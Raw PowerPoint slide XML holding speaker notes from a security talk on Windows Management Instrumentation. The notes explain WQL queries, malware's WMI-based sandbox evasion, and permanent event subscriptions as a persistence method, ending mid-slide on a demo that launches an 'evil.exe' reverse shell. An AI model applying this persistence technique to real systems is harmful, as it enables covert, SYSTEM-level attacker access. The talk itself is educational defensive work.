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69" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId24"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="270" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="292" r:id="rId6"/>
    <p:sldId id="277" r:id="rId7"/>
    <p:sldId id="279" r:id="rId8"/>
    <p:sldId id="278" r:id="rId9"/>
    <p:sldId id="286" r:id="rId10"/>
    <p:sldId id="267" r:id="rId11"/>
    <p:sldId id="299" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="288" r:id="rId14"/>
    <p:sldId id="287" r:id="rId15"/>
    <p:sldId id="294" r:id="rId16"/>
    <p:sldId id="300" r:id="rId17"/>
    <p:sldId id="297" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="263" r:id="rId21"/>
    <p:sldId id="293"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04" autoAdjust="0"/>
    <p:restoredTop sz="42185"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="44" d="100"/>
          <a:sy n="44" d="100"/>
        </p:scale>
        <p:origin x="3248" y="184"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-488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56F222-23A5-2F49-911B-8D7192708636}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/29/19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43F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14844271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Coming to my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I work as a senior Cybersecurity consultant at MNP. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>My job involves working with different clients from different sectors. And depending on the kind of project I'm working on I could be helping out client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build a cybersecurity program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Auditing an already existing Cybersecurity program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conducting Risk assessments for the whole organization or specific application which our client intend to implement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I'm also a QSA which means if your banks ask you to get PCI compliant I'm the guy you bring in house to audit you and give you certification of compliance. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That's my Day job. My evening/night job involves researching about malware. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I live In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ottawa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> but I did my schooling from Dalhousie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>univeristy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> here in Halifax after which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> got a job in Fredericton, NB. After living in Fredericton for 8-9 years </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>deccided</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to move to Ottawa in 2017.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Beside that I love to play poker, read and travel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1804665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how do we interact with WMI?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We use WQL queries. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are three type of WQL Queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Number 1 is the data query which are used to retrieve class instances. Remember the WIN32_process class. If you want to get a list of those instances you use Data Query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next is the Event Query. We will dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>deper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into this at the end of the presentation but for now just keep in mind that these are used to create WMI event subscription.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next we have schema Queries. Imagine if you want to actually see what WIN32_process class looks like well you can use this query type to figure that out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alright enough talk lets see an example </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11260054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how are the bad actors using WMI. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well for both evasion and persistence. We will talk about persistence in a bit but here you can see the various evasion techniques being used by malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This table is shamelessly stolen from a report by &lt;&gt;. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As you can see the bad actors are actually looking for class instances and if it exist they use it to either not execute the malware or execute a different module within the malware. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the next slide you will see a quick demo. But the purpose of that demo is to show you that PS now provide the functionality to ask the class directly for instances rather then writing the WQL query.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36519267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we will switch gear and talk about how WMI can be used for Persistence. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI has something called WMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eventing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> which is being abused by bad actors for persistence. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27293282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is WMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eventing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well its a technique to subscribe for events happening in your system. For example creation of a new process. It means that I can ask WMI to keep an eye when user launches chrome and let me know about it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not only that I can ask WMI that when user launched chrome not only tell me but here is a command or a script which I want you to execute when such an event happen. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WMI would gladly do so and not only that It would do that as SYSTEM. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eventing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> comes in two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>flavours</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> temporary and permanent. Well the main difference between them is obvious but if you restart your system temporary event subscription would be gone, to be more specific if you kill the process in our case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command prompt from where you issued the command for temporary event subscription the event subscription would be gone. On another hand Permanent event subscription persist even if you restart your system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now bad actors obviously like to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>permamenet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> event subscription and that’s what we will cover however I will show you a demo for temporary event subscription.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7911402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WMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eventing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has three main components to it. And here we are going to look at the first one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is called Event Filter. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An event filter is a WQL query which outline the event of our interest.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example: This WQL query is looking when a user launches the chrome browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now it looks scary but I’m going to break it down for you. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35011974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our original query from last Slide. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now for a second think about this query, and help me solve a little problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I want to look for Authentication failure for a user named Alice in my log files. How would you do it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Well I will first maybe run cat log file then I might pipe it to grep and look for user named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> then I might pipe it again to grep and look for keyword authentication failure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a similar way if you look at this query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instance creation event is like a log file, but the problem is that I just don’t want to run cat command once I want to keep looking for authentication failure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>continuesly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has ways to do that and so does WMI. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It has a keyword called WITHIN, think of WITHIN as a continues loop. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next we need to look for something specific in our case a process named Chrome but before we do that remember that WMI has a class called WIN32_process which represent all the processed in our system well we have to specify that first and then the name of the process. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30220834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component of WMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Eventing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is know as Event Consumer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An event consumer is the action you want to perform when you find the event you were looking for.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So WMI provide 5 type of Actions that we can perform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First you can run a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second you can run a command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third you can Create a log file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second you can create an entry in Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Applciation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Log file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally you can send an email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now if you notice number 1 and 2 seems to be something which would entice bad actors.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26931875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the third </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>componenet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is Filter to Consumer binding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We have know what event we are looking for, we know what action we want to perform when the event happens the last step is to marry them together. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sounds Good OK. So next as promised we are going to look at a demo for Temporary event subscription.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B743F4A2-CF8B-9941-A1F1-8066E6977A1E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12543990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before I show you the demo for permanent event </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subscitption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, I want to show you the commands that you need to run In order to subscribe for permanent event subscription.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So I want you to focus on the WQL query, Its messy but what I’m doing here is that even my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is not running I want system to execute my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Now my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is nothing but a reverse shell to my Kali Box.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now some of you might be saying so you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gonna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> download this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and the answer is NO. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
